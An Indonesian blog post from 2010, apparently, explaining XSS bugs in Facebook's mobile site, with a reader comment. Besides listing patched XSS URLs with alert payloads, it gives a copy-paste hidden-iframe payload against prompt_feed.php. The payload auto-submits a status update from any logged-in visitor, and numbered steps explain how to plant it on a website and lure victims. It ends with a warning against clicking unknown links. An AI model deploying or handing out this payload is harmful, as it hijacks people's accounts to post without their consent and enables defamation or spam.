Bug XSS di Facebook

Tidak ada system yang 100% aman. Begitu juga Facebook sebagai satu jejaring social nomor satu di Dunia. Kini pada tanggal 29 Maret 2010 marah terjadi seseorang yang mengupdate status tanpa ia sadari dan bukan si pengguna account yang telah mengupdatenya.

Secara sepintas dan menurut pemikiran masyarakat Awam mungkin ini adalah sesuatu hal yang aneh dan ia berpikir harus cepat-cepat mengganti kata sandi account Facebooknya. Tapi apakah benar seperti itu ? Yu sekarang kita teliti …

Sebenarnya bug-bug di Facebook sudah lama ada, tapi bug itu yang bisa saya dapatkan hanya sebatas bug XSS (Cross Site Scripting). Dibawah ini ada beberapa list bug XSS Facebook yang sudah lama dan sekarang sudah di patch (di tambal) ;

http://m.facebook.com/l.php?u=http://ex.xss/<script>alert(‘XSS’);</script>
http://touch.facebook.com/l_warn.php?u=http://ex.xss/"<script>alert(‘XSS’);</script>

Untuk lebih jelas’a bisa dilihat video di bawah ini ;

Dia atas merupakan bug-bug lama yang sekarang sudah tidak bisa di pergunakan lagi. Tapi bagaimana dengan celah keamanan Facebook yang sekarang. Banyak teman-teman saya yang pada heboh dengan Facebook’a yang mengupdate status sendiri setelah kita mengklik atau mengunjungi website tertentu. Bahkan seorang Dani Firmansyah [a.k.a XnuXer] Sendiripun terkena jebakan itu seperti pernyataan di Facebook’a ia mengeluarkan pernyataan seperti ini :

Hati-hati ada URL berterbangan mangkas fitur LIKE dan POSTING di wall, saya sudah dapetin 2 link yang hampir mirip, nanti saya coba bongkar kodenya di sini. Change password segera…

 

Kalo seorang XnuXer yang kita kenal sebagai hacking nomor dua setelah Ono W. Purbo menyatakan seperti itu berarti ini merupakan berita besar.

Oke sekarang kita bedah apa yang sebenar’a terjadi dengan orang-orang yang telah meng-update status’a tanpa ia ketahui.

Sebagai contoh coba anda kunjungi website ini ; http://smd.web.id sambil anda membuka account Facebook anda. Setelah itu coba lihat kembali ke Facebook profil anda atau anda refresh kembali halaman profil Facebook anda. Maka akan di dapat anda telah meng-Update status yang seperti ini ;

Terima kasih banyak atas kunjungan kepada situs http://smd.web.id/. Mari kita kerja sama untuk memajukan kota Sumedang di kancah Online

Lho ko bisa gitu? Berarti password saya dah di ambil orang donk?

Hmm… Tidak begitu juga sebenar’a. Semua itu terjadi dari bug XSS yang ada di Facebook Mobile. Dibawah ini letak bug XSS’a ;

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt= <script>alert('Ini adalah bug XSS')</script>

Coba letakan link itu di browser anda kemudian jalankan dengan menekan enter. Maka akan muncul tulisan seperti ini : “Ini adalah bug SXX”.

Nah dari bug itulah yang dimanfaatkan oleh orang-orang yang jail untuk membuat iseng terhadap orang lain. Cara’a seperti ini ;

1. Copas code ini ;

<iframe id="CrazyDaVinci" style="display:none;"

src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function()

{document.forms[0].message.value='Terima kasih banyak atas kunjungan kepada situs http://smd.web.id. Mari kita kerja sama untuk memajukan kota Sumedang di kancah Online';document.forms[0].submit();}</script>"></iframe>

2. Letakan code tersebut di file website anda.

3. Jika code tersebut di letakan di file index berarti anda cukup mengasih link website ke korban.

4. Kalau korban kebetulan sedang membuka Account Facebook’a maka di wall’a ia akan secara otomatis meng-Update tulisan seperti ini “Terima kasih banyak atas kunjungan kepada situs http://smd.web.id. Mari kita kerja sama untuk memajukan kota Sumedang di kancah Online”

Di atas merupakan langkah-langkah’a untuk memanfaatkan bug dari Facebook. Mending kalau pesan’a itu baik atau hanya sebatas pemberitahaun alamat website saja yang biasa di pergunakan oleh para Blogger sebagai teknik SEO model baru. Tapi bagaimana kalau  Pesan’a itu adalah merendahkan martabat kita? Wah ini bisa berbahaya, ini nama’a pencemaran nama baik.

Jadi sekarang saya isyaratkan kepada anda semua supaya tidak meng-Klik sembarangan link yang di kasih oleh orang lain. Apalagi oleh orang yang belum anda kenal. Dan bahaya lagi kalau para Pejabat sudah terkena ini, pasti jadai bahan pemberitaan nih.. =)). Pasti pesan’a yang aneh-aneh….

Iklan

16 thoughts on “Bug XSS di Facebook

  1. Keren gan, sebenarnya sih msh bnyk bug fb.
    baru-baru ini, di website mobile nya ketika kita meng-klik “see more notification…” eh kita malah nge-klik “Remove” pada tab “Poke”. hadeehhh

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s